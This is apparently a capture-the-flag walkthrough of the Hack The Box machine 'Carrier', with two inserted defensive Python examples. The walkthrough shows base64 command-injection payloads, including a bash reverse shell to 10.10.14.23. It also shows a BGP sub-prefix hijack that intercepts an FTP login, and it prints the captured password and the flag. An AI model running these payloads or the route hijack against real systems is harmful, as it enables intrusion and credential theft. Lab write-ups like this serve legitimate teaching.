root@kali:~# snmpwalk -c public -v1 10.10.10.105
iso.3.6.1.2.1.47.1.1.1.1.11 = STRING: "SN#NET_45JDX23"

2. Getting User

What we find on port 80 is the login console of Lyghtspeed, showing some error.

By reading “/doc/error_codef.pdf”, we can figure out what these error codes mean, and there is an interesting line.

At the same time, we find interesting information in “/doc/diagram_for_tac.png”.
We will use this information later.

We can guess that “SN” stands for “serial number”.
Trying a few patterns based on the SNMP information, we find this credential for Lyghtspeed:

admin:NET_45JDX23

After logging in, we find an interesting page, /diag.php.

It looks like clicking the “Verify status” button returns the output of a Linux command.
The value we post is base64-encoded.

<input type="hidden" id="check" name="check" value="cXVhZ2dh">
<div class="form-group">
    <button type="submit" class="btn btn-primary">

The decoded value of “cXVhZ2dh” is “quagga”, so the parameter is probably passed to a shell command, which would be an RCE vulnerability.
By sending an arbitrary command, we can read user.txt.

check=aHR0cDtpZDtjYXQgL3Jvb3QvdXNlci50eHQgIyA=
# http;id;cat /root/user.txt # 
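As an added example (not Carrier's own code; the real diag.php implementation is not shown on this page), here is how posted check values can be reviewed after the fact and how the status check should have been written: decode the base64, reject anything containing shell metacharacters or outside a service allow-list, and, on the application side, never hand the value to a shell. The allow-list (ALLOWED_SERVICES), the pgrep-based status command and the request-log lines are constructed for this example; only "quagga" and the injection payload come from the page.

```python
"""Review and harden the base64-wrapped `check` parameter of diag.php.

Added example for this write-up; it is not Carrier's own code, and the real
diag.php implementation is not shown on the page. Two parts:
  * decode_check()/classify()/review_log() inspect posted values the way a
    log-review or WAF script would, flagging shell metacharacters and names
    outside an allow-list;
  * build_status_command() is the hardened counterpart: the service name is
    validated and passed as its own argv element, never through a shell.
ALLOWED_SERVICES and SAMPLE_LOG are constructed assumptions.
"""
import base64
import binascii
import re

ALLOWED_SERVICES = {"quagga", "http"}          # assumed allow-list
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")     # characters that break out of a shell string
CHECK_PARAM = re.compile(r"(?:^|[?&\s])check=([A-Za-z0-9+/=]+)")

# Constructed request-log excerpt: a normal check, the page's injection
# payload, and a valid-looking but unknown service name ("sshd").
SAMPLE_LOG = [
    "POST /diag.php check=cXVhZ2dh",
    "POST /diag.php check=aHR0cDtpZDtjYXQgL3Jvb3QvdXNlci50eHQgIyA=",
    "POST /diag.php check=c3NoZA==",
]


def decode_check(value):
    """Base64-decode a posted check value; None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def classify(decoded):
    """'ok', 'invalid', 'injection' or 'unknown-service' for one decoded value."""
    if decoded is None:
        return "invalid"
    if SHELL_META.search(decoded):
        return "injection"
    if decoded not in ALLOWED_SERVICES:
        return "unknown-service"
    return "ok"


def review_log(lines):
    """Return (line_no, decoded_value, verdict) for every check= value that is not ok."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = CHECK_PARAM.search(line)
        if not m:
            continue
        decoded = decode_check(m.group(1))
        verdict = classify(decoded)
        if verdict != "ok":
            findings.append((n, decoded, verdict))
    return findings


def build_status_command(service):
    """Hardened status check: validate against the allow-list, then build an argv
    list (to be run with subprocess.run(argv), never with shell=True)."""
    if service not in ALLOWED_SERVICES:
        raise ValueError(f"service {service!r} is not in the allow-list")
    return ["pgrep", "-x", service]


if __name__ == "__main__":
    for n, decoded, verdict in review_log(SAMPLE_LOG):
        print(f"line {n}: {verdict}: {decoded!r}")
    print(build_status_command("quagga"))
```

The base64 wrapping gives no protection at all: it is decoded before the value reaches the shell, so the review step has to decode too. The allow-list check is what actually closes the hole; the argv list is a second layer in case a future change adds a service name with unusual characters.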


3. Getting Root

By taking advantage of this RCE, we can easily get a reverse shell.

check=aHR0cDtpZDtiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjIzLzQ0MyAwPiYxICMg
# http;id;bash -i >& /dev/tcp/10.10.14.23/443 0>&1 # 
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.105] 51590
bash: cannot set terminal process group (2281): Inappropriate ioctl for device
bash: no job control in this shell
root@r1:~# 

It looks like we got a root shell. However, we cannot find root.txt anywhere.
This is because we are not on 10.10.10.105:

root@r1:~# ifconfig
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:16:3e:d9:04:ea  
          inet addr:10.99.64.2  Bcast:10.99.64.255  Mask:255.255.255.0
          inet6 addr: fe80::216:3eff:fed9:4ea/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:356 errors:0 dropped:0 overruns:0 frame:0
          TX packets:191 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:42612 (42.6 KB)  TX bytes:34096 (34.0 KB)

eth1      Link encap:Ethernet  HWaddr 00:16:3e:8a:f2:4f  
          inet addr:10.78.10.1  Bcast:10.78.10.255  Mask:255.255.255.0
          inet6 addr: fe80::216:3eff:fe8a:f24f/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7495 errors:0 dropped:0 overruns:0 frame:0
          TX packets:7957 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:506169 (506.1 KB)  TX bytes:560602 (560.6 KB)

eth2      Link encap:Ethernet  HWaddr 00:16:3e:20:98:df  
          inet addr:10.78.11.1  Bcast:10.78.11.255  Mask:255.255.255.0
          inet6 addr: fe80::216:3eff:fe20:98df/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:8022 errors:0 dropped:0 overruns:0 frame:0
          TX packets:7594 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:537793 (537.7 KB)  TX bytes:536761 (536.7 KB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:368 errors:0 dropped:0 overruns:0 frame:0
          TX packets:368 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:29952 (29.9 KB)  TX bytes:29952 (29.9 KB)

On the ticket page, we find some information about this network.

We already know that Quagga is running on this server.
Through enumeration, we can find additional servers related to this one.
At the same time, we can see this server is running BGP, so BGP hijacking is a possible approach.

root@r1:/etc/quagga# cat bgpd.conf
cat bgpd.conf
!
! Zebra configuration saved from vty
!   2018/07/02 02:14:27
!
route-map to-as200 permit 10
route-map to-as300 permit 10
!
router bgp 100
 bgp router-id 10.255.255.1
 network 10.101.8.0/21
 network 10.101.16.0/21
 redistribute connected
 neighbor 10.78.10.2 remote-as 200
 neighbor 10.78.11.2 remote-as 300
 neighbor 10.78.10.2 route-map to-as200 out
 neighbor 10.78.11.2 route-map to-as300 out
!
line vty

Showing the BGP table:

r1# show ip bgp
show ip bgp
BGP table version is 0, local router ID is 10.255.255.1
Status codes: s suppressed, d damped, h history, * valid, > best, = multipath,
              i internal, r RIB-failure, S Stale, R Removed
Origin codes: i - IGP, e - EGP, ? - incomplete

   Network          Next Hop            Metric LocPrf Weight Path
*> 10.78.10.0/24    0.0.0.0                  0         32768 ?
*> 10.78.11.0/24    0.0.0.0                  0         32768 ?
*> 10.99.64.0/24    0.0.0.0                  0         32768 ?
*  10.100.10.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*  10.100.11.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*  10.100.12.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*  10.100.13.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*  10.100.14.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*  10.100.15.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*  10.100.16.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*  10.100.17.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*  10.100.18.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*  10.100.19.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*  10.100.20.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*> 10.101.8.0/21    0.0.0.0                  0         32768 i
*> 10.101.16.0/21   0.0.0.0                  0         32768 i
*> 10.120.10.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.11.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.12.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.13.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.14.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.15.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.16.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.17.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.18.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.19.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.20.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i

Total number of prefixes 27

Connections to the FTP server “10.120.15.10” are sent out via eth2 (next hop 10.78.11.2).
Next, try to capture the FTP traffic by announcing a more specific prefix for that network.
BGP configuration:

root@r1:~# vtysh
vtysh

Hello, this is Quagga (version 0.99.24.1).
Copyright 1996-2005 Kunihiro Ishiguro, et al.

r1# conf t
conf t
r1(config)# router gbp 100
router gbp 100
% Unknown command.
r1(config)# router bgp 100
router bgp 100
r1(config-router)# network 10.120.15.0/25
network 10.120.15.0/25
r1(config-router)# end
end
r1# exit

Then, assign the FTP server's address to eth2.

root@r1:~# ifconfig eth2 10.120.15.10 netmask 255.255.255.0 up

Capture the traffic with netcat.
After waiting a couple of minutes, a connection arrives from the remote host.
By replying with “331 Please specify the password.”, we obtain a password for user root.

root@r1:~# nc -nlvp 21
nc -nlvp 21
Listening on [0.0.0.0] (family 0, port 21)
Connection from [10.78.10.2] port 21 [tcp/*] accepted (family 2, sport 52504)

USER root
331 Please specify the password.
PASS BGPtelc0rout1ng
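To see the hijack from the defender's side, here is an added example (not part of the original write-up, and not Quagga code) that parses Quagga's show ip bgp table and compares the origin AS of every best route against an expected-origin table, the check an IRR/RPKI-style route monitor performs. The EXPECTED_ORIGINS table and the sample rows are constructed from the prefixes and AS numbers on this page; the /25 row is what r1's table shows after the network 10.120.15.0/25 statement above, and the column positions follow Quagga's route_vty_out() layout as seen in the table earlier on this page.

```python
"""Spot a sub-prefix hijack in Quagga's `show ip bgp` output.

Added example for this write-up (not part of the original post and not
Quagga code). It parses the fixed-width table Quagga prints and compares the
origin AS of every best route with an expected-origin table, the check an
IRR/RPKI-style route monitor performs. EXPECTED_ORIGINS and SAMPLE_TABLE are
constructed from the prefixes and AS numbers on this page; the /25 row is
what r1's table shows after the `network 10.120.15.0/25` statement.
"""
import ipaddress
import re

LOCAL_AS = 100  # r1 is AS100 per bgpd.conf

# Which AS may originate which block (assumed policy for this example).
EXPECTED_ORIGINS = {
    ipaddress.ip_network("10.101.8.0/21"): 100,
    ipaddress.ip_network("10.101.16.0/21"): 100,
    ipaddress.ip_network("10.100.0.0/16"): 200,
    ipaddress.ip_network("10.120.0.0/16"): 300,
}

# Quagga route_vty_out() layout: status [0:3], Network [3:20], Next Hop [20:36],
# Metric [36:46], LocPrf [46:53], Weight [53:60], then AS path and origin code.
SAMPLE_TABLE = """\
   Network          Next Hop            Metric LocPrf Weight Path
*> 10.100.10.0/24   10.78.10.2               0             0 200 i
*                   10.78.11.2                             0 300 200 i
*> 10.101.8.0/21    0.0.0.0                  0         32768 i
*> 10.120.15.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.15.0/25   0.0.0.0                  0         32768 i
"""

STATUS = re.compile(r"[ *sSRdh][ >=hd][ i]")


def parse_bgp_table(text):
    """Return one dict (prefix, next_hop, best, as_path, origin_code) per table row."""
    routes, current = [], None
    for line in text.splitlines():
        if len(line) < 62 or not STATUS.fullmatch(line[:3]):
            continue                      # banner, legend and footer lines
        network = line[3:20].strip()
        if network == "Network":
            continue                      # column header
        if network:
            current = ipaddress.ip_network(network)
        elif current is None:
            continue
        tokens = line[60:].split()        # AS path followed by the origin code
        routes.append({
            "prefix": current,            # blank Network column = same prefix as above
            "next_hop": line[20:36].strip(),
            "best": line[1] == ">",
            "as_path": [int(t) for t in tokens[:-1] if t.isdigit()],
            "origin_code": tokens[-1],
        })
    return routes


def origin_as(route):
    """Origin AS: last AS in the path, or LOCAL_AS for a locally injected route."""
    return route["as_path"][-1] if route["as_path"] else LOCAL_AS


def find_hijacks(routes, expected=EXPECTED_ORIGINS):
    """(prefix, seen_origin, expected_origin) for best routes inside a block whose
    registered origin differs. A more-specific prefix from the wrong AS (here the
    /25 originated locally inside AS300's /16) is exactly what a hijack looks like."""
    alerts = []
    for r in routes:
        if not r["best"]:
            continue
        seen = origin_as(r)
        for block, owner in expected.items():
            if r["prefix"].subnet_of(block) and seen != owner:
                alerts.append((str(r["prefix"]), seen, owner))
    return alerts


if __name__ == "__main__":
    for prefix, seen, owner in find_hijacks(parse_bgp_table(SAMPLE_TABLE)):
        print(f"ALERT {prefix}: originated by AS{seen}, expected AS{owner}")
```

The same check run on AS200's or AS300's side would raise the alert as soon as the /25 is learned from r1, because longest-prefix matching makes the /25 win over the legitimate /24 regardless of AS path length; that is why origin validation (RPKI ROAs with a maxLength, or at least prefix-list filters on the neighbor sessions) rather than path length is the control that matters here.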

We cannot use this password for FTP.
However, we can use it to log in to “10.10.10.105” with SSH.

root@kali:~# ssh root@10.10.10.105
The authenticity of host '10.10.10.105 (10.10.10.105)' can't be established.
ECDSA key fingerprint is SHA256:ocbg7qpaEpjQc5WGCnavYd2bgyXg7S8if8UaXgT1ztE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.105' (ECDSA) to the list of known hosts.
root@10.10.10.105's password: 
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-24-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Mar 19 17:48:44 UTC 2019

  System load:  0.08               Users logged in:       0
  Usage of /:   40.8% of 19.56GB   IP address for ens33:  10.10.10.105
  Memory usage: 32%                IP address for lxdbr0: 10.99.64.1
  Swap usage:   0%                 IP address for lxdbr1: 10.120.15.10
  Processes:    211


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

4 packages can be updated.
0 updates are security updates.


Last login: Wed Sep  5 14:32:15 2018
root@carrier:~# ls
root.txt  secretdata.txt
root@carrier:~# cat root.txt 
2832e552061532250ac2a21478fd4866